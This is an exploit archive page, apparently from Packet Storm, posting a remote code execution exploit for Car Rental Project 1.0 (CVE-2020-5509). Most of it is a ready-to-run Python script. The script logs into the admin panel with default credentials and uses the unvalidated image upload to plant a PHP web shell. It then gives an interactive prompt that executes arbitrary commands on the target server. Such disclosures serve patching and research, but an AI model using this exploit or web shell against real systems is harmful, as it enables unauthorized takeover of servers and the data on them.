what you don't know can hurt you

Car Rental Project 1.0 Remote Code Execution

Car Rental Project 1.0 Remote Code Execution
Posted Jan 13, 2020
Authored by FULLSHADE

Car Rental Project version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2020-5509
MD5 | fafdcec88f9ac512f946d18943f934c2

Car Rental Project 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Car Rental Project v.1.0 Remote Code Execution
# Google Dork: N/A
# Date: 1/3/2020
# Exploit Author: FULLSHADE
# Vendor Homepage:
https://phpgurukul.com/
# Software Link:
https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509

==================================================

Information & description

==================================================

Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.

==================================================

Manual POC

==================================================

Manual POC method

- Visit carrental > admin login > changeimage1.php
- Upload a php rce vulnerable payload
- Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
- Execute commands on the server

==================================================
POC automation script
==================================================

import sys
import requests

print(
"""
+-------------------------------------------------------------+
Car Rental Project v1.0 - Remote Code Execution

FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
"""
)

def login():

sessionObj = requests.session()

RHOSTS = sys.argv[1]
bigstring = "\n+-------------------------------------------------------------+\n"
print("+-------------------------------------------------------------+")
print("[+] Victim host: {}".format(RHOSTS))

POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
SHELL_UPLOAD_URL = (
"http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
)

# login / authentication
payload = {"username": "admin", "password": "Test@12345", "login": ""}
login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
# get response
if login.status_code == 200:
print("[+] Login HTTP response code: 200")
print("[+] Successfully logged in")
else:
print("[!] Failed to authenticate")
sys.exit()

# get session token
session_cookie_dic = sessionObj.cookies.get_dict()
token = session_cookie_dic["PHPSESSID"]
print("[+] Session cookie: {}".format(token))

# proxy for Burp testing

proxies = {"http": "
http://127.0.0.1:8080
", "https": "
http://127.0.0.1:8080
"}

# data for uploading the backdoor request
backdoor_file = {
"img1": (
"1dccadfed7bcbb036c56a4afb97e906f.php",
'<?php system($_GET["cmd"]); ?>',
"Content-Type application/x-php",
)
}
backdoor_data = {"update": ""}

SHELL_UPLOAD_URL = (
"http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
)

# actually upload the php shell
try:
r = sessionObj.post(
url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data
)
print(
"[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring
)
except:
print("[!] Failed to upload backdoor")

# get command execution
while True:
COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
SHELL_LOCATION = (
"http://"
+ RHOSTS
+ "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
)
# get RCE results
respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
print(respond.text)

if __name__ == "__main__":
login()
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    1 Files
  • 24
    Jan 24th
    1 Files
  • 25
    Jan 25th
    36 Files
  • 26
    Jan 26th
    26 Files
  • 27
    Jan 27th
    28 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close